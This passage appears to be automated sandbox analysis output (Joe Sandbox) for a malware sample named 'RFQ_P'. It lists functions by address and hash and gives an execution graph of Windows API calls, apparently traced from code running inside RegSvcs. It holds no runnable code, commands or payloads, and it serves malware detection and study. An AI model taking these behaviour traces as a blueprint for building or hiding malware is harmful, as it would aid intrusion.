                                                                                                              • Opcode Fuzzy Hash: 1fbd77dd60f4efd754d462d05fad800323fd8ce4001c3fe87f48189c42354f43
                                                                                                              • Instruction Fuzzy Hash: 91E14A74E106598FDB14CFA8C594AADFBB2FF88301F248169D815AB356DB30AD42CF60
                                                                                                              Function 00655498 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $4,
                                                                                                              • API String ID: 0-1240967226
                                                                                                              • Opcode ID: 134d2536f310b2dedfe75dfc0eecc78e65118e32cf9c2b12905ec489c4432b70
                                                                                                              • Instruction ID: bb6b20742e2ab7233aaccb478afca10f0d774928a1102d6845143e1c11d0332f
                                                                                                              • Opcode Fuzzy Hash: 134d2536f310b2dedfe75dfc0eecc78e65118e32cf9c2b12905ec489c4432b70
                                                                                                              • Instruction Fuzzy Hash: 10E13A74E106598FDB14DFA8C594AADFBB2FF88301F248169D815AB356DB30AD41CFA0
                                                                                                              Function 00655980 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AZi
                                                                                                              • API String ID: 0-578702922
                                                                                                              • Opcode ID: cb6b6586bf95ba81839fe584880c1af6a83963e09ae7b0bca739cd8f9899c55e
                                                                                                              • Instruction ID: bb86995907565606047971ac7f88cf2ceffe827b1279302941c95f127b04aca9
                                                                                                              • Opcode Fuzzy Hash: cb6b6586bf95ba81839fe584880c1af6a83963e09ae7b0bca739cd8f9899c55e
                                                                                                              • Instruction Fuzzy Hash: 20E12974E106598FDB14DFA8C594AADFBB2FF88301F24816AD815AB356DB30AD41CF60
                                                                                                              Function 001B4B48 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 98R
                                                                                                              • API String ID: 0-576591972
                                                                                                              • Opcode ID: 4cb3f25c362c7415b6832116e248699f15bc153d3bd287bc015ba27963ae81bd
                                                                                                              • Instruction ID: b01b82046bf44570a6db5f4851cf924106bb61942024abf3401660415dbf2c9a
                                                                                                              • Opcode Fuzzy Hash: 4cb3f25c362c7415b6832116e248699f15bc153d3bd287bc015ba27963ae81bd
                                                                                                              • Instruction Fuzzy Hash: 11711674E0520A9FCB08CFA9D580AEEFBB2FB88311F24C52AD515AB355D7349A41CF94
                                                                                                              Function 001BC022 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: w7e^
                                                                                                              • API String ID: 0-1657886525
                                                                                                              • Opcode ID: 9d11c369eaa9d2768d2f74ce3f749840ca853e36c59fc090ee359b0561098a90
                                                                                                              • Instruction ID: 9d319e048f33ef555ac85fc3283f088d12b94bf0a66891aaefa4f335128b098c
                                                                                                              • Opcode Fuzzy Hash: 9d11c369eaa9d2768d2f74ce3f749840ca853e36c59fc090ee359b0561098a90
                                                                                                              • Instruction Fuzzy Hash: 63412374D05249DFCB08DFAAC8406EEFBB1FB89300F24956AD405B7254D3384642CF99
                                                                                                              Function 001BC030 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: w7e^
                                                                                                              • API String ID: 0-1657886525
                                                                                                              • Opcode ID: cdfb4ea59f254a5ab0cc4365e9dfbd5a42d35f4dbf5acb7774081873367689e6
                                                                                                              • Instruction ID: a07e4b74087871f988bcf5b0131587549704c9375bdb67be5321b3e7e3f65eac
                                                                                                              • Opcode Fuzzy Hash: cdfb4ea59f254a5ab0cc4365e9dfbd5a42d35f4dbf5acb7774081873367689e6
                                                                                                              • Instruction Fuzzy Hash: 9141E2B4D05219DBCB08DFAAC9406EEFBB1FB89301F24952AD416B7254D33846428FA8
                                                                                                              Function 001B86B8 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0ni
                                                                                                              • API String ID: 0-1488673370
                                                                                                              • Opcode ID: 5a81242ea301d891b9f7d5fcc0b229d9e9d9eca86bcff786084cc09c66473be9
                                                                                                              • Instruction ID: 646afc3fa35e61e9ecbf6809e7400303c92c250f9a586f143a6075eccf5da639
                                                                                                              • Opcode Fuzzy Hash: 5a81242ea301d891b9f7d5fcc0b229d9e9d9eca86bcff786084cc09c66473be9
                                                                                                              • Instruction Fuzzy Hash: 3F515371E056588BEB68CF6B8D5479AFBF3AFC9300F54C1AAC40DA6265DB301A858F11
                                                                                                              Function 001BB8E8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: s+
                                                                                                              • API String ID: 0-3916939658
                                                                                                              • Opcode ID: 1296a95863ba48711995b12938c688935bbe40e5ee825f8f24c69c65aa8bb974
                                                                                                              • Instruction ID: fb1e577e11dae7cd741c04c094d41be5014b0b76b2a693a50465f53d5df01b2b
                                                                                                              • Opcode Fuzzy Hash: 1296a95863ba48711995b12938c688935bbe40e5ee825f8f24c69c65aa8bb974
                                                                                                              • Instruction Fuzzy Hash: AD411FB0D0A20ADFDB48CFA5D5816AEFBF1EF89304F20946AC505B7664E3748741CB95
                                                                                                              Function 001B203B Relevance: .5, Instructions: 499COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a5943a7ab6eea2b01c0a5664fca4602288128fc49ffa892c5d7dec21a220625a
                                                                                                              • Instruction ID: 4ccaa1b840080ab2a2069957a48f180d3384d8fe68043ac90bc824b113b9dcee
                                                                                                              • Opcode Fuzzy Hash: a5943a7ab6eea2b01c0a5664fca4602288128fc49ffa892c5d7dec21a220625a
                                                                                                              • Instruction Fuzzy Hash: 8832D670E002198FDB54DFA9C880AEEFBB2FF88300F1485A9D559A7255DB349A85CF50
                                                                                                              Function 006547CF Relevance: .3, Instructions: 325COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ab9c9886521dd9f347f9a011d1cf57bd5352c035c8f2e879b9e85149ec53b70c
                                                                                                              • Instruction ID: ffbdbd70cf3f23ca1f2782a8722f3c5637cb0c04bbfe4f05135e40d9d3b95811
                                                                                                              • Opcode Fuzzy Hash: ab9c9886521dd9f347f9a011d1cf57bd5352c035c8f2e879b9e85149ec53b70c
                                                                                                              • Instruction Fuzzy Hash: 5EE12E74E102598FDB14DFA8C590AADFBB2FF89305F2481AAD814A7356DB30AD45CF60
                                                                                                              Function 00654C28 Relevance: .3, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f4d30eb3b34a61e51b584c35c2c6a878adbbc81613be11982a139f4acab3b9ed
                                                                                                              • Instruction ID: 26e3114743efeb1f4ab1b3e00385584f036bffbfd85d15a42bee2ecdc5bb5b5b
                                                                                                              • Opcode Fuzzy Hash: f4d30eb3b34a61e51b584c35c2c6a878adbbc81613be11982a139f4acab3b9ed
                                                                                                              • Instruction Fuzzy Hash: 38E11C74E102598FDB14DFA8C590AADFBB2FF89305F2481A9D814A7356DB309D45CFA0
                                                                                                              Function 001BD16A Relevance: .3, Instructions: 271COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9abb3df871e0ab49cce2159cb2e4936d9e3ea9d7dd9223b55ce1dfc19759a43
                                                                                                              • Instruction ID: 61608bf2fed3cc96e5bad242b35b4028b7b819a8694f2a5d56142be8aeaaa413
                                                                                                              • Opcode Fuzzy Hash: f9abb3df871e0ab49cce2159cb2e4936d9e3ea9d7dd9223b55ce1dfc19759a43
                                                                                                              • Instruction Fuzzy Hash: B0B10871D05249DFDB18CFA6D9806DEFBB2FF89300F21946AD015AB264EB349A46CF11
                                                                                                              Function 001B6E48 Relevance: .2, Instructions: 196COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4eb293013a3ce775696919bb0ee1be3e6c682f22c709ecea184cc66ebbe9e1b7
                                                                                                              • Instruction ID: ec82eabce996483f095572a5835da9c44829794c4588ec9d9202317e0fdaddf7
                                                                                                              • Opcode Fuzzy Hash: 4eb293013a3ce775696919bb0ee1be3e6c682f22c709ecea184cc66ebbe9e1b7
                                                                                                              • Instruction Fuzzy Hash: 9891C374A1521ACFCB08CF99C5849AEFBF1FF89310F25956AD415BB260D334AA41CF51
                                                                                                              Function 001BC3E0 Relevance: .2, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 095603fea6b507bfa209b4d99abcb27843582c4e73abe623074408616beb4295
                                                                                                              • Instruction ID: 177ed89c1b2b0d19669cfa804e6c2966b7d5476c342b904912b249c522e706b3
                                                                                                              • Opcode Fuzzy Hash: 095603fea6b507bfa209b4d99abcb27843582c4e73abe623074408616beb4295
                                                                                                              • Instruction Fuzzy Hash: 3D914074E142698FDB14DF69C990AADFBB2FF89300F24C1A9D408A7356D7309A41CFA1
                                                                                                              Function 001B8258 Relevance: .2, Instructions: 173COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dbb1e60d71764eee6e6f6287e4758c7ebed19b185eafd1c6dbd611771eb37fdd
                                                                                                              • Instruction ID: 1bae382f1d72bbceb50dc5c1cf0e2546108cd5a358f31d725509e666e921c3b2
                                                                                                              • Opcode Fuzzy Hash: dbb1e60d71764eee6e6f6287e4758c7ebed19b185eafd1c6dbd611771eb37fdd
                                                                                                              • Instruction Fuzzy Hash: 7A71D374E156098FCB08CFA9CA805DEFBF6FB89310F24946AD415BB364D7349A42CB64
                                                                                                              Function 00654C1A Relevance: .1, Instructions: 132COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 64a1bf7ca70514caf878556b0e2de3b6f9f4ecc035a8791515e449d87117657e
                                                                                                              • Instruction ID: c77c2997451c34b9464fbcb10e3fa313940ee2eed09ac4b56a2ce3746605cbca
                                                                                                              • Opcode Fuzzy Hash: 64a1bf7ca70514caf878556b0e2de3b6f9f4ecc035a8791515e449d87117657e
                                                                                                              • Instruction Fuzzy Hash: BA513F70E102598FDB14CF69C9905ADFBF2BF89305F2481AAD818AB356DB319D41CF61
                                                                                                              Function 006547F0 Relevance: .1, Instructions: 127COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c651f913ee163625417226a2ce8f495affa18a447b6b4823576a8dd042129635
                                                                                                              • Instruction ID: 90181036b1ed3079889f7a1f9c06f25d1b57f22375b91f37b74483fa39836c89
                                                                                                              • Opcode Fuzzy Hash: c651f913ee163625417226a2ce8f495affa18a447b6b4823576a8dd042129635
                                                                                                              • Instruction Fuzzy Hash: 3A511E70E002598FDB14DFA9C9805AEFBF2BF89305F24C1AAD818A7356DB319941CF60
                                                                                                              Function 001B84E8 Relevance: .1, Instructions: 108COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d9dd280b39f51e2a393a6bf8264afe06cc27c2095b1e852496e6335bcf9486f0
                                                                                                              • Instruction ID: 14edc225faff6427c58e21913fc8339046a7dc1d91279f108ac71e9934eaeb52
                                                                                                              • Opcode Fuzzy Hash: d9dd280b39f51e2a393a6bf8264afe06cc27c2095b1e852496e6335bcf9486f0
                                                                                                              • Instruction Fuzzy Hash: 2341D6B1E0521ADBCB48CFAAC5815EEFBF6AF88700F24D569C405B7214DB349A41CBA4
                                                                                                              Function 001BB8F8 Relevance: .1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0671fed7c095d17a8eabab094e0eac56cd7e7df6a32b5418ba10169d4adbf1f2
                                                                                                              • Instruction ID: 18399911dc2298ee7af93451b88b49808e21dfb161549f37b096685439cb5a69
                                                                                                              • Opcode Fuzzy Hash: 0671fed7c095d17a8eabab094e0eac56cd7e7df6a32b5418ba10169d4adbf1f2
                                                                                                              • Instruction Fuzzy Hash: 934100B0E0A60ADFCB48CFA5D5816AEFBF1EF89304F20946AC105B7664D3745741CB94
                                                                                                              Function 001B8050 Relevance: .1, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 932594a54701c3433b4dd6cc7da54cdf3942622eda8652dbabf39f2af7d40d16
                                                                                                              • Instruction ID: 65c3d47049913cc0aab0c0015e37993d0632bea74c573c7ded1cef8e445850a5
                                                                                                              • Opcode Fuzzy Hash: 932594a54701c3433b4dd6cc7da54cdf3942622eda8652dbabf39f2af7d40d16
                                                                                                              • Instruction Fuzzy Hash: 7E41D7B0E0520ADFCB48DFAAC8805EEFBF6BB88700F24C52AD415A7254D7349A45CF94
                                                                                                              Function 00650040 Relevance: .1, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e1bbdc4264871ca1a447f9eed8a03945e47fd802ace11297e28a1b91b494c9f6
                                                                                                              • Instruction ID: dc322884b8ba1ab336e122dae88948c6fdbd9b6fec36e22b2d1333e0cadb8d2f
                                                                                                              • Opcode Fuzzy Hash: e1bbdc4264871ca1a447f9eed8a03945e47fd802ace11297e28a1b91b494c9f6
                                                                                                              • Instruction Fuzzy Hash: 2631B5B1E016188BEB18CF6AC9407AEFAF7BFC9301F14C1A9D909A6255DB305986CF51
                                                                                                              Function 001B32A0 Relevance: .1, Instructions: 67COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a83ec5a28513c8d126143998fb4e8ee5c177129c61ccd5189d097468a150c18d
                                                                                                              • Instruction ID: 6beff8e7f6834c21c3d9c3febcc87494d8884127478d09f4975602de7e09f2a4
                                                                                                              • Opcode Fuzzy Hash: a83ec5a28513c8d126143998fb4e8ee5c177129c61ccd5189d097468a150c18d
                                                                                                              • Instruction Fuzzy Hash: 4721EA71E056589BEB18CFAB9C506DEFBF3AFC9300F08C1BAC418A6264DB3016568F11

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.5%
                                                                                                              Dynamic/Decrypted Code Coverage:3.8%
                                                                                                              Signature Coverage:6.1%
                                                                                                              Total number of Nodes:131
                                                                                                              Total number of Limit Nodes:8
                                                                                                              execution_graph 77104 425063 77108 42507c 77104->77108 77105 425106 77106 4250c4 77112 42eb03 77106->77112 77108->77105 77108->77106 77110 425101 77108->77110 77111 42eb03 RtlFreeHeap 77110->77111 77111->77105 77115 42cd93 77112->77115 77114 4250d1 77116 42cdad 77115->77116 77117 42cdbe RtlFreeHeap 77116->77117 77117->77114 77118 42c003 77119 42c020 77118->77119 77122 95fdc0 LdrInitializeThunk 77119->77122 77120 42c048 77122->77120 77123 424cc3 77124 424cdf 77123->77124 77125 424d07 77124->77125 77126 424d1b 77124->77126 77128 42ca13 NtClose 77125->77128 77133 42ca13 77126->77133 77130 424d10 77128->77130 77129 424d24 77136 42ec23 RtlAllocateHeap 77129->77136 77132 424d2f 77134 42ca30 77133->77134 77135 42ca41 NtClose 77134->77135 77135->77129 77136->77132 77137 42fba3 77138 42fbb3 77137->77138 77139 42fbb9 77137->77139 77142 42ebe3 77139->77142 77141 42fbdf 77145 42cd43 77142->77145 77144 42ebfe 77144->77141 77146 42cd5d 77145->77146 77147 42cd6e RtlAllocateHeap 77146->77147 77147->77144 77148 41e863 77149 41e889 77148->77149 77153 41e97d 77149->77153 77154 42fcd3 77149->77154 77151 41e91e 77151->77153 77160 42c053 77151->77160 77155 42fc43 77154->77155 77156 42fca0 77155->77156 77157 42ebe3 RtlAllocateHeap 77155->77157 77156->77151 77158 42fc7d 77157->77158 77159 42eb03 RtlFreeHeap 77158->77159 77159->77156 77161 42c070 77160->77161 77164 95fae8 LdrInitializeThunk 77161->77164 77162 42c09c 77162->77153 77164->77162 77165 41b683 77167 41b6c7 77165->77167 77166 41b6e8 77167->77166 77168 42ca13 NtClose 77167->77168 77168->77166 77169 413e83 77170 413ea2 77169->77170 77172 42cca3 77169->77172 77173 42ccbd 77172->77173 77176 95fb68 LdrInitializeThunk 77173->77176 77174 42cce5 77174->77170 77176->77174 77183 4143f3 77184 41440d 77183->77184 77185 414470 77184->77185 77186 41445f PostThreadMessageW 77184->77186 77186->77185 77187 419155 77188 42ca13 NtClose 77187->77188 77189 41915f 77188->77189 77190 401b94 77191 401ba1 77190->77191 77194 430073 77191->77194 77197 42e673 77194->77197 77198 42e6bc 77197->77198 77209 4073c3 77198->77209 77200 42e6d2 77208 401c17 77200->77208 77212 41b493 77200->77212 77202 42e6f1 77203 42e706 77202->77203 77227 42cde3 77202->77227 77223 428593 77203->77223 77206 42e720 77207 42cde3 ExitProcess 77206->77207 77207->77208 77230 416863 77209->77230 77211 4073d0 77211->77200 77213 41b4bf 77212->77213 77241 41b383 77213->77241 77216 41b4ec 77219 42ca13 NtClose 77216->77219 77221 41b4f7 77216->77221 77217 41b520 77217->77202 77218 41b504 77218->77217 77220 42ca13 NtClose 77218->77220 77219->77221 77222 41b516 77220->77222 77221->77202 77222->77202 77224 4285f4 77223->77224 77226 428601 77224->77226 77252 418a13 77224->77252 77226->77206 77228 42cdfd 77227->77228 77229 42ce0e ExitProcess 77228->77229 77229->77203 77231 41687d 77230->77231 77233 416896 77231->77233 77234 42d463 77231->77234 77233->77211 77235 42d47d 77234->77235 77236 42d4ac 77235->77236 77237 42c053 LdrInitializeThunk 77235->77237 77236->77233 77238 42d509 77237->77238 77239 42eb03 RtlFreeHeap 77238->77239 77240 42d51c 77239->77240 77240->77233 77242 41b479 77241->77242 77243 41b39d 77241->77243 77242->77216 77242->77218 77247 42c0f3 77243->77247 77246 42ca13 NtClose 77246->77242 77248 42c110 77247->77248 77251 9607ac LdrInitializeThunk 77248->77251 77249 41b46d 77249->77246 77251->77249 77253 418a3d 77252->77253 77259 418f3b 77253->77259 77260 414063 77253->77260 77255 418b6a 77256 42eb03 RtlFreeHeap 77255->77256 77255->77259 77257 418b82 77256->77257 77258 42cde3 ExitProcess 77257->77258 77257->77259 77258->77259 77259->77226 77264 414083 77260->77264 77262 4140e2 77262->77255 77263 4140ec 77263->77255 77264->77263 77265 41b7a3 RtlFreeHeap LdrInitializeThunk 77264->77265 77265->77262 77177 95f9f0 LdrInitializeThunk 77178 414484 77179 414436 77178->77179 77180 41448c 77178->77180 77181 414470 77179->77181 77182 41445f PostThreadMessageW 77179->77182 77182->77181

                                                                                                              Executed Functions

                                                                                                              Function 0042CA13 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 201 42ca13-42ca4f call 404753 call 42dc33 NtClose
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CA4A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: 39038782108515c71a78006feec956be81ea4cb259396ad082bb91abc1ea49dd
                                                                                                              • Instruction ID: db200549b6b222148207f8d6f986de2405ec562ad3a5bd5d5972b8caa0164721
                                                                                                              • Opcode Fuzzy Hash: 39038782108515c71a78006feec956be81ea4cb259396ad082bb91abc1ea49dd
                                                                                                              • Instruction Fuzzy Hash: EDE04F352402147BC520AA5ADC41F9B776CDBC5714F408419FA5867141CAB4790187A5
                                                                                                              Function 009607AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 215 9607ac-9607c1 LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                              Function 0095F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph
